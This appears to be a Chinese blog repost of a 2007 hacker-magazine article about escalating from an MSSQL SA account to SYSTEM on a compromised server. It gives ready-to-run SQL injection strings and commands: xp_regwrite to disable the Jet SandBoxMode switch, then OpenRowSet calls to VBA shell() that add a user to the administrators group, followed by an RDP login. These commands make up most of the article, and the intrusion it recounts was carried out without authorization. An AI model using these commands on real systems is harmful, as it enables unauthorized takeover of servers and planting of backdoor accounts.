[重要通告]如您遇疑難雜癥,本站支持知識(shí)付費(fèi)業(yè)務(wù),掃右邊二維碼加博主微信,可節(jié)省您寶貴時(shí)間哦!

一把“沙盒”提權(quán)
今天實(shí)踐了一把“沙盒”提權(quán)
文章登于2007年2月的黑客X檔案雜志
作者:職業(yè)欠錢

動(dòng)易出新洞,呆呆找到了后臺(tái)密碼,得到shell,su端口被改,沒別的途徑,數(shù)據(jù)庫連接帳號(hào)是SA,執(zhí)行命令的存儲(chǔ)過程無效(自己上傳了dll文件恢復(fù)了xp_cmdshell也沒用,OA_create和Job也試了,執(zhí)行命令無回顯),本欲放棄,想起前輩的一句話:“得到了SA拿不到system權(quán)限是水平問題”,于是仔細(xì)想了下,不能執(zhí)行命令,還有讀和寫文件的超級(jí)權(quán)限,而且注冊(cè)表的讀和寫權(quán)限也是有的,因此前輩的話非常有道理,有了這些權(quán)限,僅僅是不能執(zhí)行命令就放棄,太劃不來了。

想起一個(gè)沙盒的故事,那是很早以前,kevin1986還沒退出這個(gè)圈子,神秘兮兮的在賣一個(gè)工具,說是MDB注射時(shí)可以拿到system權(quán)限的工具,價(jià)錢不緋

大約一年后,這個(gè)真相終于被人公布了,引用一篇文章如下:
調(diào)用特殊函數(shù)實(shí)現(xiàn)SQL注入
首先我在(http://support.microsoft.com/kb/q239104/)這份資料知道在accessl里可以直接進(jìn)行sql查詢,具體的在Access中測(cè)試.測(cè)試的SQL語句如下:

Select shell('c:\windows\system32\cmd.exe /c net user ray 123 /ad');

查看計(jì)算機(jī)管理的本地用戶,馬上發(fā)現(xiàn)多出一個(gè)ray用戶,說明語句成功執(zhí)行了.接下來寫一個(gè)VBS腳本任意連接一個(gè)mdb來測(cè)試這個(gè)SQL語句

Set Conn=Createobject("Adodb.Connection")

Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=test.mdb"

Set Rs=Conn.execute("Select Shell(""cmd.exe /c net user ray 123 /ad"")")
Msgbox Rs(0)
運(yùn)行后會(huì)出現(xiàn)"表達(dá)式中的'Shell'函數(shù)未定義"的錯(cuò)誤,提到WINDOWS在Jet引擎中設(shè)置了一個(gè)名為SandBoxMode的開關(guān),它的注冊(cè)表位置在 HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine\SandBoxMode里,0為在任何所有者中中都禁止起用安全設(shè)置,1為僅在允許的范圍之內(nèi),2則是必須是Access的模式下,3則是完全開啟安全設(shè)置.默認(rèn)情況下為2,只能在Access 的模式下調(diào)用VBA的shell()函數(shù),我們嘗試將此注冊(cè)表值改為0,結(jié)果成功的運(yùn)行了VBS利用Jet引擎可以調(diào)用VBA的shell()函數(shù)執(zhí)行了系統(tǒng)命令.

通常一臺(tái)MSSQL服務(wù)器同時(shí)支持Access數(shù)據(jù)庫,所以只要有一個(gè)sa或者dbowner的連接,就滿足了修改注冊(cè)表的條件,因?yàn)镸SSQL有一個(gè)名為xp_regwrite的擴(kuò)展,它的作用是修改注冊(cè)表的值.語法如下
exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value
如果存在一個(gè)sa或者dbowner的連接的SQL注入點(diǎn),就可以構(gòu)造出如下注入語句
InjectionURL;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD','0'--
那我們將SandBoxMode開關(guān)的注冊(cè)表值修改為0就成功了.接著連接到一個(gè)Access數(shù)據(jù)庫中,就可以執(zhí)行系統(tǒng)命令,當(dāng)然執(zhí)行系統(tǒng)命令我們只需要一個(gè)Access數(shù)據(jù)庫相關(guān)Select的注入點(diǎn)或者直接用ASP文件Select調(diào)用這個(gè)VBA的 shell()函數(shù),但是實(shí)際上MSSQL有一個(gè)的OpenRowSet函數(shù),它的作用是打開一個(gè)特殊的數(shù)據(jù)庫或者連接到另一個(gè)數(shù)據(jù)庫之中.當(dāng)我們有一個(gè) SA權(quán)限連接的時(shí)候,就可以做到打開Jet引擎連接到一個(gè)Access數(shù)據(jù)庫,同時(shí)我們搜索系統(tǒng)文件會(huì)發(fā)現(xiàn)windows系統(tǒng)目錄下本身就存在兩個(gè) Access數(shù)據(jù)庫,位置在%windir%\system32\ias\ias.mdb或者%windir%\system32\ias\ dnary.mdb,這樣一來我們又可以利用OpenRowSet函數(shù)構(gòu)造出如下注入語句:
InjectionURL';Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user ray 123 /ad")');--
如果你覺得不大好懂的話,我可以給你做一個(gè)簡(jiǎn)化的理解:
1,Access可以調(diào)用VBS的函數(shù),以System權(quán)限執(zhí)行任意命令
2,Access執(zhí)行這個(gè)命令是有條件的,需要一個(gè)開關(guān)被打開
3,這個(gè)開關(guān)在注冊(cè)表里
4,SA是有權(quán)限寫注冊(cè)表的
5,用SA寫注冊(cè)表的權(quán)限打開那個(gè)開關(guān)
6,調(diào)用Access里的執(zhí)行命令方法,以system權(quán)限執(zhí)行任意命令

所以,今天我使用HDSI的執(zhí)行SQL命令,執(zhí)行了以下命令:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD','0'

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user zyqq 123 /add")');

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators zyqq /add")');
最后,用這個(gè)新加上的用戶,成功登陸3389!

據(jù)說DBO也有寫注冊(cè)表的權(quán)限,那么如果制作出一個(gè)專用的工具來,以后的提權(quán)道路確實(shí)會(huì)又寬廣了很多!不過DBO這個(gè)寫注冊(cè)表的權(quán)限我還沒有測(cè)試,一會(huì)測(cè)試了把報(bào)告發(fā)上來。

問題未解決?付費(fèi)解決問題加Q或微信 2589053300 (即Q號(hào)又微信號(hào))右上方掃一掃可加博主微信

所寫所說,是心之所感,思之所悟,行之所得;文當(dāng)無敷衍,落筆求簡(jiǎn)潔。 以所舍,求所獲;有所依,方所成!

支付寶贊助
微信贊助

免責(zé)聲明,若由于商用引起版權(quán)糾紛,一切責(zé)任均由使用者承擔(dān)。

您必須遵守我們的協(xié)議,如您下載該資源,行為將被視為對(duì)《免責(zé)聲明》全部內(nèi)容的認(rèn)可->聯(lián)系老梁投訴資源
LaoLiang.Net部分資源來自互聯(lián)網(wǎng)收集,僅供用于學(xué)習(xí)和交流,請(qǐng)勿用于商業(yè)用途。如有侵權(quán)、不妥之處,請(qǐng)聯(lián)系站長并出示版權(quán)證明以便刪除。 敬請(qǐng)諒解! 侵權(quán)刪帖/違法舉報(bào)/投稿等事物聯(lián)系郵箱:service@laoliang.net
意在交流學(xué)習(xí),歡迎贊賞評(píng)論,如有謬誤,請(qǐng)聯(lián)系指正;轉(zhuǎn)載請(qǐng)注明出處: » 一把“沙盒”提權(quán)

發(fā)表回復(fù)

本站承接,網(wǎng)站推廣(SEM,SEO);軟件安裝與調(diào)試;服務(wù)器或網(wǎng)絡(luò)推薦及配置;APP開發(fā)與維護(hù);網(wǎng)站開發(fā)修改及維護(hù); 各財(cái)務(wù)軟件安裝調(diào)試及注冊(cè)服務(wù)(金蝶,用友,管家婆,速達(dá),星宇等);同時(shí)也有客戶管理系統(tǒng),人力資源,超市POS,醫(yī)藥管理等;

立即查看 了解詳情